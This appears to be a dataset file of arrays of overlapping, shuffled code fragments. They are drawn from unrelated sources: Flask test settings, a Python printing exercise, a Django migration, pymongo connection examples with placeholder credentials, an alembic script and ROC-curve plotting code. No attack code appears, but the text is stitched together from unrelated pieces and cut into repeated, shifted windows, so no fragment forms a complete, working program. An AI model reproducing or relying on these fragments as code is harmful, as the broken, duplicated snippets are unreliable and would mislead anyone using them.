[ "SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT = False WTF_CSRF_METHODS", "app.settings import * DEBUG = False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME", "True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT = False", "* DEBUG = False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost'", "TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT", "False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False", "DEBUG = False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED", "= False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED =", "= True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT =", "= 'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT = False WTF_CSRF_METHODS =", "'sqlite:///:memory:' SERVER_NAME = 'localhost' WTF_CSRF_ENABLED = False WTF_CSRF_CHECK_DEFAULT = False WTF_CSRF_METHODS = []", "import * DEBUG = False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' SERVER_NAME =", "from app.settings import * DEBUG = False TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:'" ]
[ "* \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\" paragrafo", "= \"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\" paragrafo = \"Cev\" tran_titulo(titulo_principal)", "+ 5) * \"~\") print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal =", "print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso", "\"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\" paragrafo =", "5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\"", "print((x + 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python", "* \"~\") print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario", "\"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\" paragrafo = \"Cev\" tran_titulo(titulo_principal) tran_titulo(titulo_secundario)", "= len(tit) print((x + 5) * \"~\") print(f\" {tit}\") print((x + 5) *", "+ 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python no", "print((x + 5) * \"~\") print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal", "<reponame>NathanMuniz/Exercises-Python def tran_titulo(tit): x = len(tit) print((x + 5) * \"~\") print(f\" {tit}\")", "x = len(tit) print((x + 5) * \"~\") print(f\" {tit}\") print((x + 5)", "titulo_secundario = \"Curso de Python no Youtube\" paragrafo = \"Cev\" tran_titulo(titulo_principal) tran_titulo(titulo_secundario) tran_titulo(paragrafo)", "5) * \"~\") print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal = \"<NAME>\"", "def tran_titulo(tit): x = len(tit) print((x + 5) * \"~\") print(f\" {tit}\") print((x", "\"~\") print(f\" {tit}\") print((x + 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario =", "{tit}\") print((x + 5) * \"~\") titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de", "len(tit) print((x + 5) * \"~\") print(f\" {tit}\") print((x + 5) * \"~\")", 
"tran_titulo(tit): x = len(tit) print((x + 5) * \"~\") print(f\" {tit}\") print((x +", "titulo_principal = \"<NAME>\" titulo_secundario = \"Curso de Python no Youtube\" paragrafo = \"Cev\"" ]
[ "by Django 2.2 on 2019-04-24 03:05 from django.db import migrations, models class Migration(migrations.Migration):", "Generated by Django 2.2 on 2019-04-24 03:05 from django.db import migrations, models class", "# Generated by Django 2.2 on 2019-04-24 03:05 from django.db import migrations, models", "('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser', name='shifts_per_roster',", "class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser',", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ]", "= [ ('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField(", "operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser', name='shifts_per_roster', field=models.IntegerField(default=10), preserve_default=False, ),", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations =", "Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name',", "Django 2.2 on 2019-04-24 03:05 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.RemoveField(", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations", "2.2 on 2019-04-24 03:05 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "03:05 from django.db import migrations, models 
class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'),", "] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser', name='shifts_per_roster', field=models.IntegerField(default=10), preserve_default=False,", "on 2019-04-24 03:05 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "= [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser', name='shifts_per_roster', field=models.IntegerField(default=10), preserve_default=False, ), ]", "dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ),", "[ ('users', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser',", "'0001_initial'), ] operations = [ migrations.RemoveField( model_name='customuser', name='ward_name', ), migrations.AddField( model_name='customuser', name='shifts_per_roster', field=models.IntegerField(default=10),", "2019-04-24 03:05 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('users',", "migrations, models class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [" ]
[ "# Install pymongo using 'pip install pymongo' import urllib from pymongo import MongoClient", "certificate validation # The MONGODB-X509 mechanism authenticates a username derived from the #", "during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem')", "username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation # The MONGODB-X509", "MongoClient('localhost', 27017) # or use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client", "the URI MUST be percent escaped. client = MongoClient( \"mongodb://<access_key_id>:<secret_access_key>@localhost/?authMechanism=MONGODB-AWS\") # Check status", "admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections", "for connecting to atlas # Format : # client = pymongo.MongoClient(<Atlas connection string>)", "username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS IAM", "password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation # The MONGODB-X509 mechanism", "= MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections #", "name of the X.509 certificate presented by the driver during TLS/SSL negotiation. 
client", "username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using", "= MongoClient('localhost', 27017) # or use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/')", "= MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use pip3 install pymongo[tls] for", "= MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or use the entire URL", "client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use", ": # Format : # client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017)", "name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256')", "tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS IAM credentials # The access_key_id", "localhost : # Format : # client = MongoClient('<host>', port_number) client = MongoClient('localhost',", "the X.509 certificate presented by the driver during TLS/SSL negotiation. client = MongoClient('localhost',", "# distinguished subject name of the X.509 certificate presented by the driver during", "presented by the driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\",", "via URI : # Use pip3 install pymongo[tls] for connecting to atlas #", "atlas # Format : # client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient(", "% (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides the default database", "the default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva',", "certificate presented by the driver during TLS/SSL negotiation. 
client = MongoClient('localhost', username=\"<X.509 derived", "tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS IAM credentials # The", "URI : # Use pip3 install pymongo[tls] for connecting to atlas # Format", "pymongo' import urllib from pymongo import MongoClient client = MongoClient() # Connect to", "into the URI MUST be percent escaped. client = MongoClient( \"mongodb://<access_key_id>:<secret_access_key>@localhost/?authMechanism=MONGODB-AWS\") # Check", "# The access_key_id and secret_access_key passed into the URI MUST be percent escaped.", "client = MongoClient() # Connect to localhost : # Format : # client", "'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username = \"Atharva\" password = r\"<PASSWORD>\" client", "overrides the default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost',", "negotiation. 
client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS", "credentials # The access_key_id and secret_access_key passed into the URI MUST be percent", "URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI :", "MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use pip3 install", "= \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With", "import urllib from pymongo import MongoClient client = MongoClient() # Connect to localhost", "pip3 install pymongo[tls] for connecting to atlas # Format : # client =", "distinguished subject name of the X.509 certificate presented by the driver during TLS/SSL", "pymongo import MongoClient client = MongoClient() # Connect to localhost : # Format", "r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource", "= MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use pip3", "= r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here", "and Password username = \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username),", "Connections # Authenticate using AWS IAM credentials # The access_key_id and secret_access_key passed", "TLS/SSL connections with certificate validation # The MONGODB-X509 mechanism authenticates a username derived", "= pymongo.MongoClient(<Atlas connection string>) client = 
MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password", "The access_key_id and secret_access_key passed into the URI MUST be percent escaped. client", "connections with certificate validation # The MONGODB-X509 mechanism authenticates a username derived from", "connecting to atlas # Format : # client = pymongo.MongoClient(<Atlas connection string>) client", "MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation # The", "MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use pip3 install pymongo[tls] for connecting", "MongoClient client = MongoClient() # Connect to localhost : # Format : #", "using 'pip install pymongo' import urllib from pymongo import MongoClient client = MongoClient()", "= MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username = \"Atharva\" password =", "MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides the default", "authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS IAM credentials", "connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username =", "authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation # The MONGODB-X509 mechanism authenticates", "Password username = \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password)))", "Authenticate 
using AWS IAM credentials # The access_key_id and secret_access_key passed into the", "client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections", "driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem',", "using AWS IAM credentials # The access_key_id and secret_access_key passed into the URI", "= MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation #", "import MongoClient client = MongoClient() # Connect to localhost : # Format :", "client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation", "authenticates a username derived from the # distinguished subject name of the X.509", "tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS IAM credentials #", "client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username = \"Atharva\" password", "username = \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) #", "Here authSource overrides the default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client", "Format : # client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or", "Format : # client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 
'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') #", "urllib from pymongo import MongoClient client = MongoClient() # Connect to localhost :", "use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect", "MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username = \"Atharva\" password = r\"<PASSWORD>\"", "# client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI : #", "# Authenticate using AWS IAM credentials # The access_key_id and secret_access_key passed into", "AWS IAM credentials # The access_key_id and secret_access_key passed into the URI MUST", "# Format : # client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority')", "Connect to localhost : # Format : # client = MongoClient('<host>', port_number) client", "of the X.509 certificate presented by the driver during TLS/SSL negotiation. client =", "secret_access_key passed into the URI MUST be percent escaped. 
client = MongoClient( \"mongodb://<access_key_id>:<secret_access_key>@localhost/?authMechanism=MONGODB-AWS\")", "client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides", "the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via", "subject name of the X.509 certificate presented by the driver during TLS/SSL negotiation.", "pymongo[tls] for connecting to atlas # Format : # client = pymongo.MongoClient(<Atlas connection", "derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate using AWS", "install pymongo[tls] for connecting to atlas # Format : # client = pymongo.MongoClient(<Atlas", "client = MongoClient('localhost', 27017) # or use the entire URL # client =", "Percent-Escaping Username and Password username = \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1'", "Install pymongo using 'pip install pymongo' import urllib from pymongo import MongoClient client", "\"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption", "# With encryption # Here authSource overrides the default database name which is", "TLS/SSL negotiation. 
client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') #", "authSource overrides the default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client =", "urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides the default database name which", "to atlas # Format : # client = pymongo.MongoClient(<Atlas connection string>) client =", "# The MONGODB-X509 mechanism authenticates a username derived from the # distinguished subject", "With encryption # Here authSource overrides the default database name which is admin", "encryption # Here authSource overrides the default database name which is admin #", "from the # distinguished subject name of the X.509 certificate presented by the", "Username and Password username = \"Atharva\" password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' %", "<filename>mongoDB/connections.py # Install pymongo using 'pip install pymongo' import urllib from pymongo import", "validation # The MONGODB-X509 mechanism authenticates a username derived from the # distinguished", "The MONGODB-X509 mechanism authenticates a username derived from the # distinguished subject name", "username derived from the # distinguished subject name of the X.509 certificate presented", ": # Use pip3 install pymongo[tls] for connecting to atlas # Format :", "the # distinguished subject name of the X.509 certificate presented by the driver", "database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db',", "passed into the URI MUST be percent escaped. 
client = MongoClient( \"mongodb://<access_key_id>:<secret_access_key>@localhost/?authMechanism=MONGODB-AWS\") #", "# or use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/')", "MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True, tlsCertificateKeyFile='/path/to/client.pem', tlsCAFile='/path/to/ca.pem') # AWS Connections # Authenticate", "'pip install pymongo' import urllib from pymongo import MongoClient client = MongoClient() #", "client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and", "to localhost : # Format : # client = MongoClient('<host>', port_number) client =", "IAM credentials # The access_key_id and secret_access_key passed into the URI MUST be", "the driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\", tls=True,", "= MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides the", "port_number) client = MongoClient('localhost', 27017) # or use the entire URL # client", "AWS Connections # Authenticate using AWS IAM credentials # The access_key_id and secret_access_key", "entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') # Connect via URI", "# Here authSource overrides the default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256", "derived from the # distinguished subject name of the X.509 certificate presented by", "pymongo using 'pip install pymongo' import urllib from pymongo import MongoClient client =", "SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', 
authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate", "by the driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509 derived username>\", authMechanism=\"MONGODB-X509\",", "Connect via URI : # Use pip3 install pymongo[tls] for connecting to atlas", "= MongoClient() # Connect to localhost : # Format : # client =", "default database name which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password',", "or use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client = MongoClient('mongodb://localhost:27017/') #", "# client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username", "# Percent-Escaping Username and Password username = \"Atharva\" password = r\"<PASSWORD>\" client =", "access_key_id and secret_access_key passed into the URI MUST be percent escaped. client =", "client = MongoClient('mongodb://localhost:27017/') # Connect via URI : # Use pip3 install pymongo[tls]", "which is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') #", "# client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or use the", "# Use pip3 install pymongo[tls] for connecting to atlas # Format : #", "a username derived from the # distinguished subject name of the X.509 certificate", "MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or use the entire URL #", "and secret_access_key passed into the URI MUST be percent escaped. 
client = MongoClient(", "password = r\"<PASSWORD>\" client = MongoClient('mongodb://%s:%s@127.0.0.1' % (urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption #", "from pymongo import MongoClient client = MongoClient() # Connect to localhost : #", "pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username", "(urllib.parse.quote_plus(username), urllib.parse.quote_plus(password))) # With encryption # Here authSource overrides the default database name", "is admin # SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL", "# SCRAM-SHA-1/SCRAM-SHA-256 client = MongoClient('localhost', username='Atharva', password='password', authSource='some_db', authMechanism='SCRAM-SHA-256') # TLS/SSL connections with", "with certificate validation # The MONGODB-X509 mechanism authenticates a username derived from the", "X.509 certificate presented by the driver during TLS/SSL negotiation. client = MongoClient('localhost', username=\"<X.509", "# AWS Connections # Authenticate using AWS IAM credentials # The access_key_id and", "URI MUST be percent escaped. 
client = MongoClient( \"mongodb://<access_key_id>:<secret_access_key>@localhost/?authMechanism=MONGODB-AWS\") # Check status print(client.stats)", "client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or use the entire", "27017) # or use the entire URL # client = MongoClient('mongodb://<host>:<portnum>/') client =", "string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping Username and Password username = \"Atharva\"", "install pymongo' import urllib from pymongo import MongoClient client = MongoClient() # Connect", "Use pip3 install pymongo[tls] for connecting to atlas # Format : # client", ": # client = pymongo.MongoClient(<Atlas connection string>) client = MongoClient( 'mongodb+srv://admin:<password>@cluster0-pm5vp.mongodb.net/test?retryWrites=true&w=majority') # Percent-Escaping", "MongoClient() # Connect to localhost : # Format : # client = MongoClient('<host>',", "authMechanism='SCRAM-SHA-256') # TLS/SSL connections with certificate validation # The MONGODB-X509 mechanism authenticates a", "# TLS/SSL connections with certificate validation # The MONGODB-X509 mechanism authenticates a username", "MONGODB-X509 mechanism authenticates a username derived from the # distinguished subject name of", "mechanism authenticates a username derived from the # distinguished subject name of the", "# Connect to localhost : # Format : # client = MongoClient('<host>', port_number)", ": # client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) # or use", "# Connect via URI : # Use pip3 install pymongo[tls] for connecting to", "# Format : # client = MongoClient('<host>', port_number) client = MongoClient('localhost', 27017) #" ]
[ "import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.exit( load_entry_point('alembic==0.8.10', 'console_scripts',", "__requires__ = 'alembic==0.8.10' import sys from pkg_resources import load_entry_point if __name__ == '__main__':", "'alembic==0.8.10' import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.exit( load_entry_point('alembic==0.8.10',", "from pkg_resources import load_entry_point if __name__ == '__main__': sys.exit( load_entry_point('alembic==0.8.10', 'console_scripts', 'alembic')() )", "<filename>myenv/Scripts/alembic-script.py #!e:\\python\\szuprojects\\flasky\\myenv\\scripts\\python3.exe # EASY-INSTALL-ENTRY-SCRIPT: 'alembic==0.8.10','console_scripts','alembic' __requires__ = 'alembic==0.8.10' import sys from pkg_resources import", "# EASY-INSTALL-ENTRY-SCRIPT: 'alembic==0.8.10','console_scripts','alembic' __requires__ = 'alembic==0.8.10' import sys from pkg_resources import load_entry_point if", "EASY-INSTALL-ENTRY-SCRIPT: 'alembic==0.8.10','console_scripts','alembic' __requires__ = 'alembic==0.8.10' import sys from pkg_resources import load_entry_point if __name__", "#!e:\\python\\szuprojects\\flasky\\myenv\\scripts\\python3.exe # EASY-INSTALL-ENTRY-SCRIPT: 'alembic==0.8.10','console_scripts','alembic' __requires__ = 'alembic==0.8.10' import sys from pkg_resources import load_entry_point", "'alembic==0.8.10','console_scripts','alembic' __requires__ = 'alembic==0.8.10' import sys from pkg_resources import load_entry_point if __name__ ==", "sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.exit( load_entry_point('alembic==0.8.10', 'console_scripts', 'alembic')()", "= 'alembic==0.8.10' import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.exit(" ]
[ "gene for genes in [ true_interactions.e1, predicted_interactions.e1, true_interactions.e2, predicted_interactions.e2 ] for gene in", "= index.split(interaction_indices) return a_node == another_node def _get_evaluation_on_given_labels( labels, true_interactions, predicted_interactions, no_self_loops=True ):", "method ) + 'AUC=%0.2f' % mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True)", "value='YY', condition='', unit='pathway', legend=True ) plt.xlim([0, 1]) plt.ylim([0, 1]) plt.xlabel(xlabel) plt.ylabel(ylabel) plt.title(title) if", "| _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices = [ index for index", "show it in legend if auc_dict_list: for method in auc_dict_list.keys(): mean_auc = np.mean(auc_dict_list[method])", "name to include AUC to show it in legend if auc_dict_list: for method", "reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx, yy, threshold =", "= sns.color_palette(\"colorblind\") sns.set_palette(color_palette) def _get_total_undirected_interactions(n): return n * (n - 1) / 2", "a df with multiple methods plot a roc curve using sns.tspot.\"\"\" xlabel =", "a roc curve using sns.tspot.\"\"\" xlabel = 'False Discovery Rate' ylabel = 'True", "int(total_interactions) - len(interaction_indices) y = np.append(true_interactions.values, np.zeros((zero_interactions))) scores = np.append( predicted_interactions.values, np.zeros((zero_interactions)) )", "area_under_curve def plot_roc_curve_from_df( df, auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df with", "xx, yy) area_under_curve = auc(xx, yy) yy = np.interp(reference_xx, xx, yy) else: yy", "in indexes ]) return indexes[filtering] def _is_index_diagonal(index, interaction_indices='<->'): a_node, another_node = index.split(interaction_indices) return", "mean_auc ) df = df.sort_values(by='method') df.rename(columns={'method': ''}, inplace=True) # to avoid legend 
title", "auc_dict_list=None, output_filepath=None, figsize=(6, 6) ): \"\"\"From a df with multiple methods plot a", "y, scores) reference_xx = np.linspace(0, 1, number_of_roc_points) if sum(y) > 0: xx, yy,", "number_of_roc_points * [pathway_name], 'method': ( number_of_roc_points * [method_name] ), 'YY': yy, 'XX': reference_xx.tolist()", "in labels_set) def _filter_indices_with_labels(indexes, labels, interaction_symbol='<->'): labels_set = set(labels) filtering = pd.Series([ _check_index(index,", "predicted_interactions, no_self_loops=True ): total_interactions = _get_total_undirected_interactions(len(labels)) interaction_indices = list( set( _filter_indices_with_labels(predicted_interactions.index, labels) |", "return y, scores def get_roc_df( pathway_name, method_name, true_interactions, predicted_interactions, number_of_roc_points=100 ): \"\"\"Return dataframe", "set( _filter_indices_with_labels(predicted_interactions.index, labels) | _filter_indices_with_labels(true_interactions.index, labels) ) ) if no_self_loops: interaction_indices = [", "as pd import numpy as np import matplotlib.pyplot as plt import seaborn as", "predicted_interactions.e2 ] for gene in genes } y, scores 